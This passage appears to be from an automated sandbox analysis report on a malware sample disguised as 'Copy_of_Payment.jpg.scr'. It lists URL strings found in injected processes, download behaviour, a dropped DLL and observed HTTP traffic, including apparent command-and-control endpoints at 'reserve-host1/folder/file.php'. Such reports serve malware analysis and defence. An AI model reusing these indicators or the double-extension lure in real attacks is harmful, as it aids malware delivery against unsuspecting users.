Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4ttp?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1374&y=514
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4uls.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1279&y
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4uls?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1279&y=447
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4v3d.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4v3d?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4xsu.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=244&y=
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4xsu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=244&y=208
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4y5g.img?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4y5g?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4yki.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4yki?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa545i.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa545i?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa550m.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa550m?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaabsty.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=787&y=4
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaabsty?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=787&y=411
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaabz7v.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaabz7v?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaac2ci.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1267&y
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaac2ci?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1267&y=602
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaac7xk.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1122&y=
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaac7xk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1122&y=911
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaace1r.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaace1r?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaacg4r.img?h=426&w=624&m=6&q=60&o=f&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaacg4r?h=426&w=624&m=6&q=60&o=f&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaacjoj.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=915&y=
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaacjoj?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=915&y=813
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aanahz.img?h=24&w=24&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aanahz?h=24&w=24&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb1kc8s.img?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb1kvzy.img?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb1kvzy?m=6&o=true&u=true&n=true&w=30&h=30
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb2neaa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb2neaa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb72boj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb72boj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb8jcor.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb8jcor?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb8uu8p.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bb8uu8p?h=72&w=112&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbakjmp.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbakjmp?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbbzimq.img?h=248&w=624&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbbzimq.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbbzimq?h=248&w=624&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbbzimq?h=72&w=112&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbh5zbr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbh5zbr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbhwlcj.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=1883&y=623
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbhwlcj?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=1883&y=623
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbhx7gn.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=1791&y=916
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbhx7gn?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=1791&y=916
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbi2lok.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=687&y=806
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbi2lok?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=687&y=806
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbi4ofp.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=1019&y=535
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbi4ofp?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=1019&y=535
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbiezx3.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=584&y=305
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/bbiezx3?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=584&y=305
Source: explorer.exe	String found in binary or memory: http://java.com/
Source: explorer.exe	String found in binary or memory: http://java.com/help
Source: explorer.exe	String found in binary or memory: http://java.com/help95
Source: explorer.exe	String found in binary or memory: http://java.com/helpcal
Source: explorer.exe	String found in binary or memory: http://java.com/helphttp://java.com/help
Source: explorer.exe	String found in binary or memory: http://java.com/helpurn25
Source: explorer.exe	String found in binary or memory: http://java.com/http://java.com/
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://logo.verisign.com/vslogo.gif0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://microsoft.com0
Source: WinMail.exe	String found in binary or memory: http://ocsp
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: WinMail.exe, ppcrlui_3580_2.3580.dr	String found in binary or memory: http://ocsp.verisign.com0
Source: explorer.exe	String found in binary or memory: http://pki.google.com/giag2.crl0
Source: explorer.exe	String found in binary or memory: http://pki.google.com/giag2.crt0
Source: taskhost.exe	String found in binary or memory: http://platform.twitter.com/widgets/follow_button.html?show_screen_name=false&screen_name=msnde&show
Source: taskhost.exe	String found in binary or memory: http://qs.ioam.de/?msn//cp//pr-finanzen/top-stories//via_szmng
Source: taskhost.exe	String found in binary or memory: http://qs.ioam.de/?msn//cp//pr-homepage//via_szmng
Source: taskhost.exe	String found in binary or memory: http://rad.msn.com/adsadclient31.dll?getsad=&dpjs=8.3&vws=1&id=3c5a903a7b6268dc000a974d7a6e6945&muid
Source: taskhost.exe	String found in binary or memory: http://rad.msn.com/adsadclient31.dll?getsad=&dpjs=8.4&vws=1&id=3c5a903a7b6268dc000a974d7a6e6945&muid
Source: dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: http://referercontent-typeauthorization;
Source: taskhost.exe	String found in binary or memory: http://res1.windows.microsoft.com/resbox/en/windows/main/2f29ed13-8741-44d3-b6cf-846cbe63351f_12.wof
Source: taskhost.exe	String found in binary or memory: http://res2.windows.microsoft.com/resbox/en/windows/main/5fdaa5e4-14c0-41a1-8810-dbaf91fb113c_11.wof
Source: taskhost.exe	String found in binary or memory: http://res2.windows.microsoft.com/resbox/en/windows/main/82470c75-e529-4009-9d4e-38ff28975a0a_11.wof
Source: taskhost.exe	String found in binary or memory: http://res2.windows.microsoft.com/resources/4.2/wol/shared/images/merged/gl_site.svg
Source: explorer.exe	String found in binary or memory: http://reserve-host1/fold
Source: explorer.exe, taskhost.exe	String found in binary or memory: http://reserve-host1/folder/file.php
Source: explorer.exe	String found in binary or memory: http://reserve-host1/folder/file.phpado
Source: explorer.exe	String found in binary or memory: http://reserve-host1/folder/file.phpd6
Source: explorer.exe	String found in binary or memory: http://reserve-host1/folder/file.phpewall
Source: explorer.exe	String found in binary or memory: http://reserve-host1/folder/file.phpfo
Source: taskhost.exe	String found in binary or memory: http://reserve-host1/folder/file.phpj
Source: explorer.exe	String found in binary or memory: http://reserve-host1/folder/file.phpvo
Source: explorer.exe	String found in binary or memory: http://reserve-host2/folder/file.php
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: http://schema.org/webpage
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.microsoft.com/passport/soapservices/ppcrl
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.microsoft.com/passport/soapservices/soapfault
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.microsoft.com/trustbridge/schema#1
Source: explorer.exe	String found in binary or memory: http://schemas.microsoft.com/win/2004/08/events/event
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2003/06/secext
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: taskhost.exe	String found in binary or memory: http://schemassoft.com/windows/2004/02/mk
Source: taskhost.exe	String found in binary or memory: http://static-finance-neu.s-msn.com/de-de/finanzen/_sc/css/7084cfbf-da46c16/direction=ltr.locales=de
Source: taskhost.exe	String found in binary or memory: http://static-finance-neu.s-msn.com/de-de/finanzen/_sc/js/7084cfbf-a4eeeb62/direction=ltr.locales=de
Source: taskhost.exe	String found in binary or memory: http://static-hp-neu.s-msn.com/_h/d6ea042c/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Source: taskhost.exe	String found in binary or memory: http://static-hp-neu.s-msn.com/de-de/homepage/_sc/css/7084cfbf-78599a0e/direction=ltr.locales=de-de.
Source: taskhost.exe	String found in binary or memory: http://static-hp-neu.s-msn.com/de-de/homepage/_sc/js/7084cfbf-1d6f2a72/direction=ltr.locales=de-de.t
Source: taskhost.exe	String found in binary or memory: http://static-hp-neu.s-msn.com/sc/38/e34ef4.woff
Source: taskhost.exe	String found in binary or memory: http://static-hp-neu.s-msn.com/sc/54/4f1880.ico
Source: taskhost.exe	String found in binary or memory: http://static-hp-neu.s-msn.com/sc/9b/e151e5.gif
Source: taskhost.exe	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: taskhost.exe	String found in binary or memory: http://t4ft.de/c/ftg_vis.min.js
Source: taskhost.exe	String found in binary or memory: http://t4ft.de/p3p.xml
Source: taskhost.exe	String found in binary or memory: http://t4ft.de/tp/?t=7217&aid=1265&fpid=1138130&fcid=45043&b=false&l=&f=true&r=http%3a%2f%2fwww.msn.
Source: explorer.exe	String found in binary or memory: http://www.%s.compa
Source: taskhost.exe	String found in binary or memory: http://www.bing.com/favicon.ico
Source: taskhost.exe	String found in binary or memory: http://www.bing.com/widget/ls/l?ig=9245633fec71a27e7bc24c480f01b97b&type=event.clientinst&data=%5b%7
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: webhp[1].htm.1236.dr	String found in binary or memory: http://www.google.com/logos/doodles/2015/dorothea-christiane-erxlebens-300th-birthday-59322747322368
Source: explorer.exe	String found in binary or memory: http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: http://www.google.com/webhp
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: http://www.google.com/webhpbcu
Source: explorer.exe	String found in binary or memory: http://www.google.com/webhpd
Source: explorer.exe	String found in binary or memory: http://www.google.de/webhp?gfe_rd=cr&ei=5bjfvtxlkjdd8gfuozv4ca
Source: WinMail.exe	String found in binary or memory: http://www.microsoft.ch
Source: taskhost.exe	String found in binary or memory: http://www.microsoft.com
Source: taskhost.exe	String found in binary or memory: http://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/vie
Source: taskhost.exe	String found in binary or memory: http://www.microsoft.com/favicon.ico
Source: netsh.exe	String found in binary or memory: http://www.microsoft.com/networking/quarantine/hcs
Source: netsh.exe	String found in binary or memory: http://www.microsoft.com/networking/quarantine/napclient
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/miccerlisca2011_2011-03-29.crt0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/miccertrulispca_2009-04-02.crt0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/microoceraut_2010-06-23.crt07
Source: explorer.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/microsoftrootcert.crt0
Source: WinMail.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/msnidentityservicespca.crt0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.microsoft.com/pki/crl/products/miccertrulispca_2009-04-02.crl
Source: WinMail.exe	String found in binary or memory: http://www.microsoft.com/pki/crl/products/msnidentityservicespca.crl0y
Source: taskhost.exe	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ppcrlui_3580_2.3580.dr	String found in binary or memory: http://www.passport.com
Source: ppcrlui_3580_2.3580.dr	String found in binary or memory: http://www.passport.net/0
Source: ppcrlui_3580_2.3580.dr	String found in binary or memory: http://www.passport.net/consumer/privacypolicy.asp
Source: ppcrlui_3580_2.3580.dr	String found in binary or memory: http://www.passport.net/consumer/termsofuse.asp
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://www.usertrust.com1
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: https://
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://accounts.google.com/servicelogin?hl=de&continue=https://www.google.de/webhp%3fgfe_rd%3dc
Source: WinMail.exe	String found in binary or memory: https://accountservices.passport.net/accountservices.srf
Source: WinMail.exe	String found in binary or memory: https://accountservices.passport.net/hp.srf
Source: WinMail.exe	String found in binary or memory: https://accountservices.passport.net/ppnetworkhome.srf
Source: explorer.exe	String found in binary or memory: https://aj6
Source: explorer.exe	String found in binary or memory: https://ajax.goog
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://apis.google.com
Source: WinMail.exe	String found in binary or memory: https://certservices.passport.com/slca.srf
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://consent.google.com?hl
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://consent.google.de
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://drive.google.com/?tab=wo
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v1/yi/r/oda9snlre86.jpg
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v2/y1/r/lvx-xkvaj0b.png
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v2/y2/r/ytik7gnolhs.js
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v2/y4/r/lrhnv2dqfvn.js
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v2/yf/r/fkdgytouams.png
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v2/ym/r/qwx8zsil-ln.png
Source: taskhost.exe	String found in binary or memory: https://fbstatic-a.akamaihd.net/rsrc.php/v2/yv/r/2sh2834wi9s.js
Source: taskhost.exe	String found in binary or memory: https://go.microsoft.com/fwlink/?linkid=251136
Source: taskhost.exe	String found in binary or memory: https://iecvlist.microsoft.com/ie11/1387494476607/iecompatviewlist.xml
Source: taskhost.exe	String found in binary or memory: https://ieonline.microsoft.com/ie/known_providers_download_v1.xml
Source: WinMail.exe	String found in binary or memory: https://loginnet.passport.com/ppsecure/md5auth.srf
Source: WinMail.exe	String found in binary or memory: https://loginnet.passport.com/resetpw.srf
Source: WinMail.exe	String found in binary or memory: https://loginnet.passport.com/rst.srf
Source: webhp[1].htm.1236.dr	String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://maps.google.de/maps?hl=de&tab=wl
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://myaccount.google.com/?utm_source=ogb
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://news.google.de/nwshp?hl=de&tab=wn&ei=6bjfvub4act-amhzkdam&ved=0cauqqs4obq
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://play.google.com/?hl=de&tab=w8
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://plus.google.com/?gpsrc=ogpy0&tab=wx
Source: taskhost.exe	String found in binary or memory: https://script.ioam.de/iam.js
Source: taskhost.exe	String found in binary or memory: https://script.ioam.de/p3p.xml
Source: WinMail.exe, explorer.exe	String found in binary or memory: https://secure.comodo.com/cps0
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://translate.google.de/?hl=de&tab=wt
Source: ppcrlui_3580_2.3580.dr	String found in binary or memory: https://uimemsvc-c.net.pdmsn.test.microsoft.com/memberservice.srf
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: https://user-agentcookieaccept-languageaccept-encodinghttp/1.transfer-encodingchunkedconnectionclose
Source: explorer.exe	String found in binary or memory: https://w
Source: explorer.exe	String found in binary or memory: https://w%bmo
Source: explorer.exe	String found in binary or memory: https://w.money
Source: explorer.exe	String found in binary or memory: https://w.sct.co
Source: WinMail.exe	String found in binary or memory: https://www
Source: taskhost.exe	String found in binary or memory: https://www.bing.com/widget/bootstrap.js?fdsetremotehost=
Source: explorer.exe	String found in binary or memory: https://www.geotrust.com/resources/repository0
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.com/calendar?tab=wc
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.com/webhp?gfe_rd=cr&ei=5bjfvtxlkjdd8gfuozv4ca&gws_rd=ssl
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/imghp?hl=de&tab=wi&ei=6bjfvub4act-amhzkdam&ved=0cbmqqi4oaq
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/intl/de/options/
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/preferences?hl=de
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/preferences?hl=de&fg=1
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/webhp?gfe_rd%3dcr%26ei%3d5bjfvtxlkjdd8gfuozv4ca%26gws_rd%3dssl
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/webhp?gfe_rd%3dcr%26ei%3d5bjfvtxlkjdd8gfuozv4ca%26gws_rd%3dssl&sig=0_lgfgt
Source: explorer.exe	String found in binary or memory: https://www.google.de/webhp?gfe_rd=cr&ei=5bjfvtxlkjdd8gfuozv4ca&gws_rd=ssl
Source: explorer.exe	String found in binary or memory: https://www.google.de/webhp?gfe_rd=cr&ei=5bjfvtxlkjdd8gfuozv4ca&gws_rd=sslnu
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/webhp?hl=de
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/webhp?tab=ww
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.google.de/webhp?tab=ww&ei=6bjfvub4act-amhzkdam&ved=0caeqqs4oaq
Source: taskhost.exe	String found in binary or memory: https://www.msn.com/de-de/homepage/secure/silentpassport?lc=1031
Source: WinMail.exe, explorer.exe	String found in binary or memory: https://www.verisign.com/cps04
Source: WinMail.exe, explorer.exe	String found in binary or memory: https://www.verisign.com/repository/cps
Source: WinMail.exe, explorer.exe	String found in binary or memory: https://www.verisign.com/repository/verisignlogo.gif0d
Source: WinMail.exe, explorer.exe	String found in binary or memory: https://www.verisign.com/rpa0
Source: WinMail.exe, explorer.exe	String found in binary or memory: https://www.verisign.com;
Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: https://www.youtube.com/?gl=de

Contains functionality to download additional files from the internet

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0042F3E4 CreateFileW,WaitForSingleObject,InternetReadFile,WriteFile,FlushFileBuffers,CloseHandle,

Downloads files

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\._files_config[1].dll

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3b7c565966d1351a HTTP/1.1 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT If-None-Match: "804047d4e66d01:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: ctldl.windowsupdate.com
Source: global traffic	HTTP traffic detected: GET /webhp HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: www.google.com Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /webhp?gfe_rd=cr&ei=5bJFVtXLKJDd8gfUoZv4CA HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: www.google.de
Source: global traffic	HTTP traffic detected: GET /crls/secureca.crl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.geotrust.com
Source: global traffic	HTTP traffic detected: GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6gw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: g.symcd.com
Source: global traffic	HTTP traffic detected: GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCGSZraQgU3E%2B HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: clients1.google.com
Source: global traffic	HTTP traffic detected: GET /pki/crl/products/CodeSignPCA.crl HTTP/1.1 Cache-Control: max-age = 900 Connection: Keep-Alive Accept: / If-Modified-Since: Mon, 16 Apr 2012 23:49:48 GMT If-None-Match: "0f6669b2b1ccd1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com

Found strings which match to known social media urls

Show sources

Source: explorer.exe	String found in binary or memory: facebook.com/ equals www.facebook.com (Facebook)
Source: explorer.exe	String found in binary or memory: facebook.com/)N equals www.facebook.com (Facebook)
